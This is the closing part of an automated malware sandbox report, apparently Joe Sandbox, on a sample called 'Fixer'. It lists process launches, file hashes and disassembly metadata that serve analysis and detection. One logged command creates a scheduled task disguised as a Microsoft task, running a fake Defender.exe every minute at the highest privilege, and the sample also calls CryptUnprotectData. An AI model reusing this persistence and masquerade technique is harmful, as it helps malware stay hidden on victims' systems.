Has exited:false

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                                                                                                                                                                                                                                              Imagebase:0x7ff679410000
                                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                                              MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:05:25:06
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x290000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:05:25:07
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\Defender.exe"
                                                                                                                                                                                                                                              Imagebase:0x5c0000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:05:25:08
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:05:25:11
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:05:26:02
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x920000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:05:26:02
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Imagebase:0x380000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:6.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:5.5%
                                                                                                                                                                                                                                                Total number of Nodes:110
                                                                                                                                                                                                                                                Total number of Limit Nodes:6

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 1$v
                                                                                                                                                                                                                                                • API String ID: 0-2456183578
                                                                                                                                                                                                                                                • Opcode ID: a818690c72e82aa63db61e810bd30c2ab9494bd927ece9b91457c3d625236891
                                                                                                                                                                                                                                                • Instruction ID: ca153b3f0f208ebf10926cc937cf7c133d44fde2d0c4c52758836b0ae4d6748a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a818690c72e82aa63db61e810bd30c2ab9494bd927ece9b91457c3d625236891
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47919374E01218CFDB68DFA9D994B9DBBB2FF89301F1480AAD809AB355DB315981CF50

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 1$v
                                                                                                                                                                                                                                                • API String ID: 0-2456183578
                                                                                                                                                                                                                                                • Opcode ID: 8c7d7d330c4db7977220828ee5774bd23a43107196fa82baf34377a0b075e0fd
                                                                                                                                                                                                                                                • Instruction ID: c101898b915b0bed503eaa813934deb40a856fa2d10c162cd730f402c1451361
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c7d7d330c4db7977220828ee5774bd23a43107196fa82baf34377a0b075e0fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19919374E01228CFDB64DFA9D954B9DBBB2FF89300F1080AAD859AB355DB315981CF50

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Hq
                                                                                                                                                                                                                                                • API String ID: 0-1594803414
                                                                                                                                                                                                                                                • Opcode ID: e85788bc73a04ed927bd116eb72f345c233bfc2b6cc24e952dff0312278d2158
                                                                                                                                                                                                                                                • Instruction ID: 9085e285d20628fe4c9049454b2791b147648cf8b413e8af24b6ed8ab3369271
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e85788bc73a04ed927bd116eb72f345c233bfc2b6cc24e952dff0312278d2158
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1E1C1B4E10229CFDB54CFA9C884BEEBBB2FF49300F1485A9D808A7255D7749A85CF50

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0623BCDD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                                • Opcode ID: 01061b5336c0038194aa405883390d124074c1e7e15116347527d26fba039c46
                                                                                                                                                                                                                                                • Instruction ID: ef0d32769fd85f065fed31c347fdb1d0c64b058898b5f77e25aa5ca1fce99079
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01061b5336c0038194aa405883390d124074c1e7e15116347527d26fba039c46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B2147B68002499FDB20CF99D845BDEBFF5EF48320F148819E954A3250C339A594DFA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0623BCDD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                                • Opcode ID: c5b874992b02e4407fa109e353ad30943bf8f3469d233c3814d859fc072fbab8
                                                                                                                                                                                                                                                • Instruction ID: d60f24d01957ac5b74305be99b8b3a7426394625b5461754d6bfdcfddc6ca3af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5b874992b02e4407fa109e353ad30943bf8f3469d233c3814d859fc072fbab8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C61159B6800249DFDB20CF9AC845BDEBBF4EF48320F148419E914A7250C379A994DFA0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD1F6
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 029CD233
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD270
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 029CD2C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 628273becc12f556e2b332ec207bbdc5ccd11c7c482d04c33ade1cd8d35416db
                                                                                                                                                                                                                                                • Instruction ID: 06743331f8c9dbe15f81fc7e29eec2150ade0fd052740e2f0523e27d32467bd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 628273becc12f556e2b332ec207bbdc5ccd11c7c482d04c33ade1cd8d35416db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 815158B09017498FDB14CFAAD989B9EBBF5FF48304F208469E409A7350D7789885CF66

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD1F6
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 029CD233
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD270
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 029CD2C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 1708641703b0ad099b5e3d8a5e5133993257a77e447c544b4d8311053acb6668
                                                                                                                                                                                                                                                • Instruction ID: d94d131cdeaff30be72dc1cde66b390d60c393b1c7b6007011879a4e6430b41e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1708641703b0ad099b5e3d8a5e5133993257a77e447c544b4d8311053acb6668
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA5158B09007498FDB14CFAAD588B9EBBF5FF48304F20C459E409A7350D7749885CB66

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 029CB146
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: f1a44f393a7b509fed7b3695cf304b78aac31728c061c617278b94abc7677605
                                                                                                                                                                                                                                                • Instruction ID: d62ffe8da1a5fb804b17e4336fb6ab8e74260cad3cc1dd5d17957b05c7aff604
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1a44f393a7b509fed7b3695cf304b78aac31728c061c617278b94abc7677605
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 507167B0A00B058FD724DF29D55179ABBF5BF88204F108A2DD48AD7B40D775E849CF92

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029C59F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 8eebe7e87c30048f78d4d8890db92073e2da1c8102af254feb7205d6e463da20
                                                                                                                                                                                                                                                • Instruction ID: 11b010be454ac15fd2b2addbec1a53247555e705a156bb3157125cb676f68b73
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eebe7e87c30048f78d4d8890db92073e2da1c8102af254feb7205d6e463da20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841E3B1D00718CBEB24CFAAC88479DBBB5FF48304F64806AD409BB251D7756989CF91

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029C59F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: db3abe5cd2396f958742845db8bdfa4c24489c421e3e04eab2e321c4c1ef36a4
                                                                                                                                                                                                                                                • Instruction ID: 4fb6d4e3878f37eea2c2a9f8542f2bf7a33138a68fe9630e11a7c55751afd2ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db3abe5cd2396f958742845db8bdfa4c24489c421e3e04eab2e321c4c1ef36a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241E2B1D00718CBEB24CFAAC88479DBBB5BF48304F64805AD419BB250D775694ACF51

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 480 29cd3b8-29cd3ba 481 29cd3c0-29cd454 DuplicateHandle 480->481 482 29cd45d-29cd47a 481->482 483 29cd456-29cd45c 481->483 483->482
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CD447
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 486 29cd3c0-29cd454 DuplicateHandle 487 29cd45d-29cd47a 486->487 488 29cd456-29cd45c 486->488 488->487
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CD447
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 491 29c8324-29c9aab 493 29c9aad-29c9ab0 491->493 494 29c9ab3-29c9ab7 491->494 493->494 495 29c9abf-29c9aeb FindWindowW 494->495 496 29c9ab9-29c9abc 494->496 497 29c9aed-29c9af3 495->497 498 29c9af4-29c9b08 495->498 496->495 497->498
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindWindowW.USER32(00000000,00000000), ref: 029C9ADE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 134000473-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 500 29c9a60-29c9aab 502 29c9aad-29c9ab0 500->502 503 29c9ab3-29c9ab7 500->503 502->503 504 29c9abf-29c9aeb FindWindowW 503->504 505 29c9ab9-29c9abc 503->505 506 29c9aed-29c9af3 504->506 507 29c9af4-29c9b08 504->507 505->504 506->507
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindWindowW.USER32(00000000,00000000), ref: 029C9ADE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 134000473-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 029CB146
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599831946.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_101d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599831946.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_101d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599778781.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_100d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 39a7d78a26d39a6ae4f22dbe6e896589ad5b40eac206363cf553f00b9156e54c
                                                                                                                                                                                                                                                • Instruction ID: c84d220f3b14895f5e6f5a240b0ded1c55dc8f11f180579abea39a42f55a2662
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a7d78a26d39a6ae4f22dbe6e896589ad5b40eac206363cf553f00b9156e54c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E018821108340ABF7125A99C884B66FFE8EF42674F18855AED850A2C2D3699884C776
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599778781.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_100d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 93626e89986fe086e6728d4042b5095d405e9b368a24f3c886a29cd08d29d98d
                                                                                                                                                                                                                                                • Instruction ID: c56c7160c281d4e54d094be2147f7db0cdf3044e062964c9f3a80adc58049092
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93626e89986fe086e6728d4042b5095d405e9b368a24f3c886a29cd08d29d98d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF04F71508344AEFB118A5AC9C4B62FFD8EB41634F18C55AED484A283C2799884CAB1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
